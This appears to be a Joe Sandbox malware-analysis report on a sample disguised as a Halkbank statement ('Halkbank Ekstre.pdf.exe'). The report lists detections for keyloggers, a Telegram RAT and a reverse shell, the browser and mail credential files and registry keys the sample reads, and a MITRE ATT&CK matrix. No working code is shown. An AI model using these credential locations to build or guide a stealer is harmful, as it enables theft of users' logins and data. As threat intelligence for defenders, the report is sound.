Source: Yara match	File source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Halkbank Ekstre.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2615770776.00000000034C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2597991445.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1426911260.0000000004063000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2615043055.0000000003327000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Halkbank Ekstre.pdf.exe PID: 1956, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Halkbank Ekstre.pdf.exe PID: 2192, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Halkbank Ekstre.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2615770776.0000000003478000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2597991445.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1426911260.0000000004063000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2615043055.0000000003327000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Halkbank Ekstre.pdf.exe PID: 1956, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Halkbank Ekstre.pdf.exe PID: 2192, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: uAHDaCgpWpsogA.exe PID: 1080, type: MEMORYSTR

Remote Access Functionality

Yara detected ReverseShell

Source: Yara match	File source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Halkbank Ekstre.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2597991445.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1426911260.0000000004063000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Halkbank Ekstre.pdf.exe PID: 1956, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Halkbank Ekstre.pdf.exe PID: 2192, type: MEMORYSTR

Yara detected Snake Keylogger

Source: Yara match	File source: 00000009.00000002.2615770776.0000000003371000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2615043055.0000000003221000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Halkbank Ekstre.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2597991445.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1426911260.0000000004063000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Halkbank Ekstre.pdf.exe PID: 1956, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Halkbank Ekstre.pdf.exe PID: 2192, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: uAHDaCgpWpsogA.exe PID: 1080, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Halkbank Ekstre.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2615770776.00000000034C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2597991445.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1426911260.0000000004063000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2615043055.0000000003327000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Halkbank Ekstre.pdf.exe PID: 1956, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Halkbank Ekstre.pdf.exe PID: 2192, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	1 Exfiltration Over Alternative Protocol	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	13 Obfuscated Files or Information	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	24 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	111 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Halkbank Ekstre.pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
Halkbank Ekstre.pdf.exe